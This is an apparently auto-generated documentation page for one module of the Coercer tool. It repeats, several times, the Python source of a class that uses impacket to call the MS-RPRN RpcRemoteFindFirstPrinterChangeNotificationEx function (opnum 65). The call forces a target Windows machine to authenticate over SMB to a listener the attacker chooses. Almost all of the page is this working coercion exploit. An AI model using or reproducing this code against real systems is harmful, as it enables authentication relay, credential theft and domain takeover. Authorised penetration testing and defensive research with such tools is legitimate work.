coercer.methods.MS_RPRN.RpcRemoteFindFirstPrinterChangeNotificationEx
1#!/usr/bin/env python3 2# -*- coding: utf-8 -*- 3# File name : RpcRemoteFindFirstPrinterChangeNotificationEx.py 4# Author : Podalirius (@podalirius_) 5# Date created : 15 Sep 2022 6 7from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL 8from coercer.network.DCERPCSessionError import DCERPCSessionError 9from impacket.dcerpc.v5 import rprn 10from impacket.dcerpc.v5.dtypes import NULL 11 12 13class RpcRemoteFindFirstPrinterChangeNotificationEx(MSPROTOCOLRPCCALL): 14 """ 15 Coercing a machine to authenticate using function RpcRemoteFindFirstPrinterChangeNotificationEx (opnum 65) of [MS-RPRN]: Print System Remote Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/eb66b221-1c1f-4249-b8bc-c5befec2314d) 16 17 Method found by: 18 - 19 """ 20 21 exploit_paths = [ 22 ("smb", '\\\\{{listener}}\x00') 23 ] 24 25 access = { 26 "ncan_np": [ 27 { 28 "namedpipe": r"\PIPE\spoolss", 29 "uuid": "12345678-1234-abcd-ef00-0123456789ab", 30 "version": "1.0" 31 } 32 ], 33 "ncacn_ip_tcp": [ 34 { 35 "uuid": "12345678-1234-ABCD-EF00-0123456789AB", 36 "version": "1.0" 37 } 38 ] 39 } 40 41 protocol = { 42 "longname": "[MS-RPRN]: Print System Remote Protocol", 43 "shortname": "MS-RPRN" 44 } 45 46 function = { 47 "name": "RpcRemoteFindFirstPrinterChangeNotificationEx", 48 "opnum": 65, 49 "vulnerable_arguments": ["pszLocalMachine"] 50 } 51 52 def trigger(self, dcerpc_session, target): 53 if dcerpc_session is not None: 54 try: 55 resp = rprn.hRpcOpenPrinter(dcerpc_session, '\\\\%s\x00' % target) 56 request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx() 57 request['hPrinter'] = resp['pHandle'] 58 request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB 59 request['pszLocalMachine'] = self.path 60 request['pOptions'] = NULL 61 resp = dcerpc_session.request(request) 62 return "" 63 except Exception as err: 64 return err 65 else: 66 print("[!] Error: dce is None, you must call connect() first.") 67 return None
class
RpcRemoteFindFirstPrinterChangeNotificationEx(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
14class RpcRemoteFindFirstPrinterChangeNotificationEx(MSPROTOCOLRPCCALL): 15 """ 16 Coercing a machine to authenticate using function RpcRemoteFindFirstPrinterChangeNotificationEx (opnum 65) of [MS-RPRN]: Print System Remote Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/eb66b221-1c1f-4249-b8bc-c5befec2314d) 17 18 Method found by: 19 - 20 """ 21 22 exploit_paths = [ 23 ("smb", '\\\\{{listener}}\x00') 24 ] 25 26 access = { 27 "ncan_np": [ 28 { 29 "namedpipe": r"\PIPE\spoolss", 30 "uuid": "12345678-1234-abcd-ef00-0123456789ab", 31 "version": "1.0" 32 } 33 ], 34 "ncacn_ip_tcp": [ 35 { 36 "uuid": "12345678-1234-ABCD-EF00-0123456789AB", 37 "version": "1.0" 38 } 39 ] 40 } 41 42 protocol = { 43 "longname": "[MS-RPRN]: Print System Remote Protocol", 44 "shortname": "MS-RPRN" 45 } 46 47 function = { 48 "name": "RpcRemoteFindFirstPrinterChangeNotificationEx", 49 "opnum": 65, 50 "vulnerable_arguments": ["pszLocalMachine"] 51 } 52 53 def trigger(self, dcerpc_session, target): 54 if dcerpc_session is not None: 55 try: 56 resp = rprn.hRpcOpenPrinter(dcerpc_session, '\\\\%s\x00' % target) 57 request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx() 58 request['hPrinter'] = resp['pHandle'] 59 request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB 60 request['pszLocalMachine'] = self.path 61 request['pOptions'] = NULL 62 resp = dcerpc_session.request(request) 63 return "" 64 except Exception as err: 65 return err 66 else: 67 print("[!] Error: dce is None, you must call connect() first.") 68 return None
Coercing a machine to authenticate using function RpcRemoteFindFirstPrinterChangeNotificationEx (opnum 65) of [MS-RPRN]: Print System Remote Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/eb66b221-1c1f-4249-b8bc-c5befec2314d)
Method found by: -
access =
{'ncan_np': [{'namedpipe': '\\PIPE\\spoolss', 'uuid': '12345678-1234-abcd-ef00-0123456789ab', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': '12345678-1234-ABCD-EF00-0123456789AB', 'version': '1.0'}]}
function =
{'name': 'RpcRemoteFindFirstPrinterChangeNotificationEx', 'opnum': 65, 'vulnerable_arguments': ['pszLocalMachine']}
def
trigger(self, dcerpc_session, target):
53 def trigger(self, dcerpc_session, target): 54 if dcerpc_session is not None: 55 try: 56 resp = rprn.hRpcOpenPrinter(dcerpc_session, '\\\\%s\x00' % target) 57 request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx() 58 request['hPrinter'] = resp['pHandle'] 59 request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB 60 request['pszLocalMachine'] = self.path 61 request['pOptions'] = NULL 62 resp = dcerpc_session.request(request) 63 return "" 64 except Exception as err: 65 return err 66 else: 67 print("[!] Error: dce is None, you must call connect() first.") 68 return None